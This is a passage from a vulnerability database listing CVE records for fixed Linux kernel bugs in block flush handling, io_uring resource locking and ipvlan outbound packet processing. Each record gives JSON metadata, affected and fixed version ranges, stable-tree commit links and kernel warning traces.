                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix request.queuelist usage in flush\n\nFriedrich Weber reported a kernel crash problem and bisected to commit\n81ada09cc25e (\"blk-flush: reuse rq queuelist in flush state machine\").\n\nThe root cause is that we use \"list_move_tail(\u0026rq-\u003equeuelist, pending)\"\nin the PREFLUSH/POSTFLUSH sequences. But rq-\u003equeuelist.next == xxx since\nit\u0027s popped out from plug-\u003ecached_rq in __blk_mq_alloc_requests_batch().\nWe don\u0027t initialize its queuelist just for this first request, although\nthe queuelist of all later popped requests will be initialized.\n\nFix it by changing to use \"list_add_tail(\u0026rq-\u003equeuelist, pending)\" so\nrq-\u003equeuelist doesn\u0027t need to be initialized. It should be ok since rq\ncan\u0027t be on any list when PREFLUSH or POSTFLUSH, has no move actually.\n\nPlease note the commit 81ada09cc25e (\"blk-flush: reuse rq queuelist in\nflush state machine\") also has another requirement that no drivers would\ntouch rq-\u003equeuelist after blk_mq_end_request() since we will reuse it to\nadd rq to the post-flush pending list in POSTFLUSH. If this is not true,\nwe will have to revert that commit IMHO.\n\nThis updated version adds \"list_del_init(\u0026rq-\u003equeuelist)\" in flush rq\ncallback since the dm layer may submit request of a weird invalid format\n(REQ_FSEQ_PREFLUSH | REQ_FSEQ_POSTFLUSH), which causes double list_add\nif without this \"list_del_init(\u0026rq-\u003equeuelist)\". The weird invalid format\nproblem should be fixed in dm layer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:58.688Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/fe1e395563ccb051e9dbd8fa99859f5caaad2e71"
        },
        {
          "url": "https://git.kernel.org/stable/c/87907bd69721a8506618a954d41a1de3040e88aa"
        },
        {
          "url": "https://git.kernel.org/stable/c/d0321c812d89c5910d8da8e4b10c891c6b96ff70"
        }
      ],
      "title": "block: fix request.queuelist usage in flush",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40925",
    "datePublished": "2024-07-12T12:25:05.747Z",
    "dateReserved": "2024-07-12T12:17:45.582Z",
    "dateUpdated": "2025-05-04T09:17:58.688Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40922 (GCVE-0-2024-40922)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-05-04 09:17

Title

io_uring/rsrc: don't lock while !TASK_RUNNING

Summary

In the Linux kernel, the following vulnerability has been resolved: io_uring/rsrc: don't lock while !TASK_RUNNING There is a report of io_rsrc_ref_quiesce() locking a mutex while not TASK_RUNNING, which is due to forgetting restoring the state back after io_run_task_work_sig() and attempts to break out of the waiting loop. do not call blocking ops when !TASK_RUNNING; state=1 set at [<ffffffff815d2494>] prepare_to_wait+0xa4/0x380 kernel/sched/wait.c:237 WARNING: CPU: 2 PID: 397056 at kernel/sched/core.c:10099 __might_sleep+0x114/0x160 kernel/sched/core.c:10099 RIP: 0010:__might_sleep+0x114/0x160 kernel/sched/core.c:10099 Call Trace: <TASK> __mutex_lock_common kernel/locking/mutex.c:585 [inline] __mutex_lock+0xb4/0x940 kernel/locking/mutex.c:752 io_rsrc_ref_quiesce+0x590/0x940 io_uring/rsrc.c:253 io_sqe_buffers_unregister+0xa2/0x340 io_uring/rsrc.c:799 __io_uring_register io_uring/register.c:424 [inline] __do_sys_io_uring_register+0x5b9/0x2400 io_uring/register.c:613 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xd8/0x270 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6f/0x77

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0c9df3df0c888d9ec…
	https://git.kernel.org/stable/c/4429c6c77e176a4c5…
	https://git.kernel.org/stable/c/54559642b96116b45…

Impacted products

Vendor

Product

Version

Linux

Affected: 4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f , < 0c9df3df0c888d9ec8d11a68474a4aa04d371cff (git)
Affected: 4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f , < 4429c6c77e176a4c5aa7a3bbd1632f9fc0582518 (git)
Affected: 4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f , < 54559642b96116b45e4b5ca7fd9f7835b8561272 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:39:55.988Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c9df3df0c888d9ec8d11a68474a4aa04d371cff"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4429c6c77e176a4c5aa7a3bbd1632f9fc0582518"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54559642b96116b45e4b5ca7fd9f7835b8561272"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40922",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:05:27.374940Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:28.678Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "io_uring/rsrc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0c9df3df0c888d9ec8d11a68474a4aa04d371cff",
              "status": "affected",
              "version": "4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f",
              "versionType": "git"
            },
            {
              "lessThan": "4429c6c77e176a4c5aa7a3bbd1632f9fc0582518",
              "status": "affected",
              "version": "4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f",
              "versionType": "git"
            },
            {
              "lessThan": "54559642b96116b45e4b5ca7fd9f7835b8561272",
              "status": "affected",
              "version": "4ea15b56f0810f0d8795d475db1bb74b3a7c1b2f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "io_uring/rsrc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/rsrc: don\u0027t lock while !TASK_RUNNING\n\nThere is a report of io_rsrc_ref_quiesce() locking a mutex while not\nTASK_RUNNING, which is due to forgetting restoring the state back after\nio_run_task_work_sig() and attempts to break out of the waiting loop.\n\ndo not call blocking ops when !TASK_RUNNING; state=1 set at\n[\u003cffffffff815d2494\u003e] prepare_to_wait+0xa4/0x380\nkernel/sched/wait.c:237\nWARNING: CPU: 2 PID: 397056 at kernel/sched/core.c:10099\n__might_sleep+0x114/0x160 kernel/sched/core.c:10099\nRIP: 0010:__might_sleep+0x114/0x160 kernel/sched/core.c:10099\nCall Trace:\n \u003cTASK\u003e\n __mutex_lock_common kernel/locking/mutex.c:585 [inline]\n __mutex_lock+0xb4/0x940 kernel/locking/mutex.c:752\n io_rsrc_ref_quiesce+0x590/0x940 io_uring/rsrc.c:253\n io_sqe_buffers_unregister+0xa2/0x340 io_uring/rsrc.c:799\n __io_uring_register io_uring/register.c:424 [inline]\n __do_sys_io_uring_register+0x5b9/0x2400 io_uring/register.c:613\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xd8/0x270 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x6f/0x77"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:54.099Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0c9df3df0c888d9ec8d11a68474a4aa04d371cff"
        },
        {
          "url": "https://git.kernel.org/stable/c/4429c6c77e176a4c5aa7a3bbd1632f9fc0582518"
        },
        {
          "url": "https://git.kernel.org/stable/c/54559642b96116b45e4b5ca7fd9f7835b8561272"
        }
      ],
      "title": "io_uring/rsrc: don\u0027t lock while !TASK_RUNNING",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40922",
    "datePublished": "2024-07-12T12:25:03.570Z",
    "dateReserved": "2024-07-12T12:17:45.582Z",
    "dateUpdated": "2025-05-04T09:17:54.099Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-33621 (GCVE-0-2024-33621)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-04 17:20

Title

ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound

Summary

In the Linux kernel, the following vulnerability has been resolved: ipvlan: Dont Use skb->sk in ipvlan_process_v{4,6}_outbound Raw packet from PF_PACKET socket ontop of an IPv6-backed ipvlan device will hit WARN_ON_ONCE() in sk_mc_loop() through sch_direct_xmit() path. WARNING: CPU: 2 PID: 0 at net/core/sock.c:775 sk_mc_loop+0x2d/0x70 Modules linked in: sch_netem ipvlan rfkill cirrus drm_shmem_helper sg drm_kms_helper CPU: 2 PID: 0 Comm: swapper/2 Kdump: loaded Not tainted 6.9.0+ #279 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 RIP: 0010:sk_mc_loop+0x2d/0x70 Code: fa 0f 1f 44 00 00 65 0f b7 15 f7 96 a3 4f 31 c0 66 85 d2 75 26 48 85 ff 74 1c RSP: 0018:ffffa9584015cd78 EFLAGS: 00010212 RAX: 0000000000000011 RBX: ffff91e585793e00 RCX: 0000000002c6a001 RDX: 0000000000000000 RSI: 0000000000000040 RDI: ffff91e589c0f000 RBP: ffff91e5855bd100 R08: 0000000000000000 R09: 3d00545216f43d00 R10: ffff91e584fdcc50 R11: 00000060dd8616f4 R12: ffff91e58132d000 R13: ffff91e584fdcc68 R14: ffff91e5869ce800 R15: ffff91e589c0f000 FS: 0000000000000000(0000) GS:ffff91e898100000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f788f7c44c0 CR3: 0000000008e1a000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> ? __warn (kernel/panic.c:693) ? sk_mc_loop (net/core/sock.c:760) ? report_bug (lib/bug.c:201 lib/bug.c:219) ? handle_bug (arch/x86/kernel/traps.c:239) ? exc_invalid_op (arch/x86/kernel/traps.c:260 (discriminator 1)) ? asm_exc_invalid_op (./arch/x86/include/asm/idtentry.h:621) ? sk_mc_loop (net/core/sock.c:760) ip6_finish_output2 (net/ipv6/ip6_output.c:83 (discriminator 1)) ? nf_hook_slow (net/netfilter/core.c:626) ip6_finish_output (net/ipv6/ip6_output.c:222) ? __pfx_ip6_finish_output (net/ipv6/ip6_output.c:215) ipvlan_xmit_mode_l3 (drivers/net/ipvlan/ipvlan_core.c:602) ipvlan ipvlan_start_xmit (drivers/net/ipvlan/ipvlan_main.c:226) ipvlan dev_hard_start_xmit (net/core/dev.c:3594) sch_direct_xmit (net/sched/sch_generic.c:343) __qdisc_run (net/sched/sch_generic.c:416) net_tx_action (net/core/dev.c:5286) handle_softirqs (kernel/softirq.c:555) __irq_exit_rcu (kernel/softirq.c:589) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1043) The warning triggers as this: packet_sendmsg packet_snd //skb->sk is packet sk __dev_queue_xmit __dev_xmit_skb //q->enqueue is not NULL __qdisc_run sch_direct_xmit dev_hard_start_xmit ipvlan_start_xmit ipvlan_xmit_mode_l3 //l3 mode ipvlan_process_outbound //vepa flag ipvlan_process_v6_outbound ip6_local_out __ip6_finish_output ip6_finish_output2 //multicast packet sk_mc_loop //sk->sk_family is AF_PACKET Call ip{6}_local_out() with NULL sk in ipvlan as other tunnels to fix this.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0049a623dfbbb4988…
	https://git.kernel.org/stable/c/54768bacfde60e8e4…
	https://git.kernel.org/stable/c/1abbf079da59ef559…
	https://git.kernel.org/stable/c/183c4b416454b9983…
	https://git.kernel.org/stable/c/cb53706a3403ba67f…
	https://git.kernel.org/stable/c/54213c09801e0bd25…
	https://git.kernel.org/stable/c/13c4543db34e0da5a…
	https://git.kernel.org/stable/c/b3dc6e8003b500861…

Impacted products

Vendor

Product

Version

Linux

Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 0049a623dfbbb49888de7f0c2f33a582b5ead989 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 54768bacfde60e8e4757968d79f8726711dd2cf5 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 1abbf079da59ef559d0ab4219d2a0302f7970761 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 183c4b416454b9983dc1b8aa0022b748911adc48 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < cb53706a3403ba67f4040b2a82d9cf79e11b1a48 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 54213c09801e0bd2549ac42961093be36f65a7d0 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < 13c4543db34e0da5a7d2f550b6262d860f248381 (git)
Affected: 2ad7bf3638411cb547f2823df08166c13ab04269 , < b3dc6e8003b500861fa307e9a3400c52e78e4d3a (git)

Linux

Affected: 3.19
Unaffected: 0 , < 3.19 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:20:25.979Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0049a623dfbbb49888de7f0c2f33a582b5ead989"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54768bacfde60e8e4757968d79f8726711dd2cf5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1abbf079da59ef559d0ab4219d2a0302f7970761"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/183c4b416454b9983dc1b8aa0022b748911adc48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb53706a3403ba67f4040b2a82d9cf79e11b1a48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54213c09801e0bd2549ac42961093be36f65a7d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/13c4543db34e0da5a7d2f550b6262d860f248381"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b3dc6e8003b500861fa307e9a3400c52e78e4d3a"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-33621",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:09:47.521739Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:46.366Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ipvlan/ipvlan_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0049a623dfbbb49888de7f0c2f33a582b5ead989",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "54768bacfde60e8e4757968d79f8726711dd2cf5",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "1abbf079da59ef559d0ab4219d2a0302f7970761",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "183c4b416454b9983dc1b8aa0022b748911adc48",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "cb53706a3403ba67f4040b2a82d9cf79e11b1a48",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "54213c09801e0bd2549ac42961093be36f65a7d0",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "13c4543db34e0da5a7d2f550b6262d860f248381",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            },
            {
              "lessThan": "b3dc6e8003b500861fa307e9a3400c52e78e4d3a",
              "status": "affected",
              "version": "2ad7bf3638411cb547f2823df08166c13ab04269",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ipvlan/ipvlan_core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.19"
            },
            {
              "lessThan": "3.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvlan: Dont Use skb-\u003esk in ipvlan_process_v{4,6}_outbound\n\nRaw packet from PF_PACKET socket ontop of an IPv6-backed ipvlan device will\nhit WARN_ON_ONCE() in sk_mc_loop() through sch_direct_xmit() path.\n\nWARNING: CPU: 2 PID: 0 at net/core/sock.c:775 sk_mc_loop+0x2d/0x70\nModules linked in: sch_netem ipvlan rfkill cirrus drm_shmem_helper sg drm_kms_helper\nCPU: 2 PID: 0 Comm: swapper/2 Kdump: loaded Not tainted 6.9.0+ #279\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nRIP: 0010:sk_mc_loop+0x2d/0x70\nCode: fa 0f 1f 44 00 00 65 0f b7 15 f7 96 a3 4f 31 c0 66 85 d2 75 26 48 85 ff 74 1c\nRSP: 0018:ffffa9584015cd78 EFLAGS: 00010212\nRAX: 0000000000000011 RBX: ffff91e585793e00 RCX: 0000000002c6a001\nRDX: 0000000000000000 RSI: 0000000000000040 RDI: ffff91e589c0f000\nRBP: ffff91e5855bd100 R08: 0000000000000000 R09: 3d00545216f43d00\nR10: ffff91e584fdcc50 R11: 00000060dd8616f4 R12: ffff91e58132d000\nR13: ffff91e584fdcc68 R14: ffff91e5869ce800 R15: ffff91e589c0f000\nFS:  0000000000000000(0000) GS:ffff91e898100000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f788f7c44c0 CR3: 0000000008e1a000 CR4: 00000000000006f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cIRQ\u003e\n ? __warn (kernel/panic.c:693)\n ? sk_mc_loop (net/core/sock.c:760)\n ? report_bug (lib/bug.c:201 lib/bug.c:219)\n ? handle_bug (arch/x86/kernel/traps.c:239)\n ? exc_invalid_op (arch/x86/kernel/traps.c:260 (discriminator 1))\n ? asm_exc_invalid_op (./arch/x86/include/asm/idtentry.h:621)\n ? sk_mc_loop (net/core/sock.c:760)\n ip6_finish_output2 (net/ipv6/ip6_output.c:83 (discriminator 1))\n ? nf_hook_slow (net/netfilter/core.c:626)\n ip6_finish_output (net/ipv6/ip6_output.c:222)\n ? __pfx_ip6_finish_output (net/ipv6/ip6_output.c:215)\n ipvlan_xmit_mode_l3 (drivers/net/ipvlan/ipvlan_core.c:602) ipvlan\n ipvlan_start_xmit (drivers/net/ipvlan/ipvlan_main.c:226) ipvlan\n dev_hard_start_xmit (net/core/dev.c:3594)\n sch_direct_xmit (net/sched/sch_generic.c:343)\n __qdisc_run (net/sched/sch_generic.c:416)\n net_tx_action (net/core/dev.c:5286)\n handle_softirqs (kernel/softirq.c:555)\n __irq_exit_rcu (kernel/softirq.c:589)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1043)\n\nThe warning triggers as this:\npacket_sendmsg\n   packet_snd //skb-\u003esk is packet sk\n      __dev_queue_xmit\n         __dev_xmit_skb //q-\u003eenqueue is not NULL\n             __qdisc_run\n               sch_direct_xmit\n                 dev_hard_start_xmit\n                   ipvlan_start_xmit\n                      ipvlan_xmit_mode_l3 //l3 mode\n                        ipvlan_process_outbound //vepa flag\n                          ipvlan_process_v6_outbound\n                            ip6_local_out\n                                __ip6_finish_output\n                                  ip6_finish_output2 //multicast packet\n                                    sk_mc_loop //sk-\u003esk_family is AF_PACKET\n\nCall ip{6}_local_out() with NULL sk in ipvlan as other tunnels to fix this."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:05:11.634Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0049a623dfbbb49888de7f0c2f33a582b5ead989"
        },
        {
          "url": "https://git.kernel.org/stable/c/54768bacfde60e8e4757968d79f8726711dd2cf5"
        },
        {
          "url": "https://git.kernel.org/stable/c/1abbf079da59ef559d0ab4219d2a0302f7970761"
        },
        {
          "url": "https://git.kernel.org/stable/c/183c4b416454b9983dc1b8aa0022b748911adc48"
        },
        {
          "url": "https://git.kernel.org/stable/c/cb53706a3403ba67f4040b2a82d9cf79e11b1a48"
        },
        {
          "url": "https://git.kernel.org/stable/c/54213c09801e0bd2549ac42961093be36f65a7d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/13c4543db34e0da5a7d2f550b6262d860f248381"
        },
        {
          "url": "https://git.kernel.org/stable/c/b3dc6e8003b500861fa307e9a3400c52e78e4d3a"
        }
      ],
      "title": "ipvlan: Dont Use skb-\u003esk in ipvlan_process_v{4,6}_outbound",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-33621",
    "datePublished": "2024-06-21T10:18:05.673Z",
    "dateReserved": "2024-06-21T10:13:16.298Z",
    "dateUpdated": "2025-11-04T17:20:25.979Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-34777 (GCVE-0-2024-34777)

Vulnerability from cvelistv5 – Published: 2024-06-21 11:18 – Updated: 2025-05-04 09:05

Title

dma-mapping: benchmark: fix node id validation

Summary

